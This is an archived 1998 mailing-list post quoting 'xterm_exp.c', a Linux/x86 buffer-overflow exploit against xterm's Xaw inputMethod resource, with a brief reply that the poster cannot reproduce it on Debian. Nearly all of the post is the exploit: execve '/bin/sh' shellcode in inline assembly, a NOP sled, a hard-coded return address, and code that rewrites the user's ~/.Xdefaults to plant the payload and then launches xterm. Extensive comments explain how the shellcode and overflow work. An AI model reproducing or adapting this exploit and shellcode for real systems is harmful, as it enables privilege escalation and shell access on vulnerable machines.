xterm exploit [TOG issue]

From: Andrea Arcangeli (arcangeliat_private)
Date: Fri May 08 1998 - 07:50:05 PDT


    /*
    
      xterm_exp.c : linux/x86 xterm.Xaw exploit
      by alcuin - 5/4/98 - [ http://www.rootshell.com/ ]
    
      It works against both Xaw and neXtaw widgets
    
      NB: you have to cp ~/.Xdefaults.old ~/.Xdefaults to be able to
      use xterm again.
    
    */
    
    #include <stdlib.h>
    #include <stdio.h>
    #include <ctype.h>
    
    
    /*
     * Read the stack pointer at the point of this call.
     *
     * The asm copies %esp into %eax and the function then falls off the end
     * without a `return`; the caller sees a value only because the i386 ABI
     * returns integers in %eax.  That is undefined behavior in standard C and
     * depends on the compiler emitting nothing that clobbers %eax between the
     * asm statement and the epilogue -- it is not portable and may break at
     * other optimisation levels.  main() uses the result as the base for the
     * hard-coded return address it plants in the overflow string.
     */
    unsigned int getsp() {
      asm("mov %esp,%eax");
    }
    
    /*
     * Payload carrier: this function is never called as C.  main() does
     * strcpy(s, (char *)rootshell), i.e. it copies the machine code starting
     * at this function's address into the overflow buffer, so the byte
     * sequence must contain no 0x00 before the NUL that ".string" appends to
     * "/bin/sh" -- that is why it builds small values with movb/xorb/incl
     * instead of 32-bit immediates.  The call/pop pair at l1/l2 makes the code
     * position-independent by loading its own address into %esi, from which
     * the embedded string is found at a fixed offset; the argument and
     * environment pointers are then laid out in memory right after it and
     * `int $0x80` with %al = 0xb issues the Linux/x86 execve system call.
     *
     * Declared `inline` with an implicit int return type (pre-C99 style);
     * it exists only so its bytes are present in the binary.
     */
    inline rootshell(){
      __asm__(
          "movb $0x56, %al\n\t"
          "l1:cmpb $0x12, %al\n\t"
          "je l2\n\t"
          "movb $0x12,%al\n\t"
          "call l1\n\t"
          "l2:pop %esi\n\t"
          "xorl %eax,%eax\n\t"
          "movb $0x25, %al\n\t"
          "addl %eax,%esi\n\t"
          "movl %esi,%ebx\n\t"
          "movl %esi,%edi\n\t"
          "movb $8,%al\n\t"
          "addl %eax,%edi\n\t"
          "movb $5,%al\n\t"
          "addl %eax,%esi\n\t"
          "movl %esi,(%edi)\n\t"
          "movl %edi,%ecx\n\t"
          "incl %edi\n\t"
          "incl %edi\n\t"
          "incl %edi\n\t"
          "incl %edi\n\t"
          "xorb %al,%al\n\t"
          "movl %eax,(%edi)\n\t"
          "movl %edi,%edx\n\t"
          "movb $0xb,%al\n\t"
          "int $0x80\n\t"
          ".string \"/bin/sh\"\n"
          );
    }
    
    
    /* All three names are relative to $HOME once main() has chdir'd there. */
    #define CONFFILE ".Xdefaults"
    #define OLDFILE ".Xdefaults.old"
    #define NEWFILE ".Xdefaults.new"
    
    /*
     * Rewrites the invoking user's own ~/.Xdefaults so that the
     * `xterm*inputMethod` resource carries a ~16 KiB overflow string, then
     * execs xterm, which reads that resource at startup.  The previous file is
     * kept as OLDFILE (see the note at the top of the file: it has to be put
     * back by hand afterwards).
     *
     * Defects in the listing, none of which it handles:
     *  - implicit-int main(); memset/strcpy/strncmp and chdir/execl are used
     *    without <string.h>/<unistd.h>, so this only builds with a lenient
     *    pre-C99 compiler; `i` is unused;
     *  - chdir() and fseek() results are ignored, so on a failed chdir the
     *    files are created in the current directory instead of $HOME;
     *  - the copy loop tests feof() before fgets() and ignores fgets()'s
     *    return value: the last line can be emitted twice when the file does
     *    not end in a newline, and a read error is indistinguishable from EOF;
     *  - `strncmp(...) < 0` keeps only lines that sort *before*
     *    "xterm*inputMethod", so every resource line that sorts after it is
     *    silently dropped from the new file, not just an existing
     *    inputMethod entry;
     *  - the return address is a fixed delta (0x69F5) from getsp() and the
     *    payload sits at fixed offsets (2052 / 2800) inside the buffer, so the
     *    whole thing is tied to one particular binary and stack layout.
     */
    main (int argc, char **argv) {
    
      char *home;
      FILE *f_in, *f_out;
      char buf[16384];
      char shellbuf[16384];
      char *s;
      int i;                      /* unused */
      unsigned int sp=getsp();    /* stack pointer in this frame, see getsp() */
    
      if (home = getenv("HOME")) chdir(home);   /* return value unchecked */
    
      if (!(f_out = fopen(NEWFILE, "w"))) {
        perror("fopen");
        exit(1);
      }
    
      /* Copy the existing resources across, minus the lines the filter below
       * rejects (see the header comment: the `< 0` test drops more than the
       * old inputMethod line). */
      if (f_in = fopen(CONFFILE, "r")) {
        fseek(f_in,0,SEEK_SET);   /* no-op right after fopen() */
        while (!feof(f_in)) {
          fgets(buf,16384,f_in);  /* result unchecked; buf may be stale at EOF */
          for (s=buf;isblank(*s);s++);
          if (strncmp(s,"xterm*inputMethod",17)<0)
            fputs(buf,f_out);
        }
        fclose(f_in);
      }
    
      /* Fill the buffer with NOPs (0x90) and NUL-terminate it so fputs() below
       * stops at the end; 0x90 itself never terminates the string. */
      memset(shellbuf, 0x90, sizeof(shellbuf));
      shellbuf[sizeof(shellbuf)-1] = 0;
    
      /* Plant the return address: 4 raw bytes at a fixed offset into the
       * string.  Offset 2052 is 4-byte aligned, so the int store is at least
       * aligned; the value is a hard-coded delta from this process's stack. */
      s = shellbuf+2052;
      *(int *)s=sp+0x69F5;
    
      /* Copy the payload bytes (see rootshell) after the NOP run; strcpy()
       * stops at the first NUL, i.e. the terminator of the embedded string. */
      s = shellbuf+2800;
      strcpy(s,(char*)rootshell);
    
      fputs("xterm*inputMethod:",f_out);
      fputs(shellbuf, f_out);
      fclose(f_out);                /* return value unchecked */
    
      /* Both commands take only string-literal arguments; results unchecked. */
      system("/bin/cp "CONFFILE" "OLDFILE);
      system("/bin/mv -f "NEWFILE" "CONFFILE);
    
      /* Replaces this process; reached with main()'s implicit return only if
       * execl() fails. */
      execl("/usr/X11R6/bin/xterm","xterm",NULL);
    }
    
    I can't reproduce the problem with the latest Debian compiled XFree86:
    
    andrea@dragon:~$ dpkg -l xbase
    Desired=Unknown/Install/Remove/Purge
    | Status=Not/Installed/Config-files/Unpacked/Failed-config/Half-installed
    |/ Err?=(none)/Hold/Reinst-required/X=both-problems (Status,Err: uppercase=bad)
    ||/ Name            Version        Description
    +++-===============-==============-============================================
    ii  xbase           3.3.2-4        local clients and configuration required by
    
    Andrea[s] Arcangeli
    


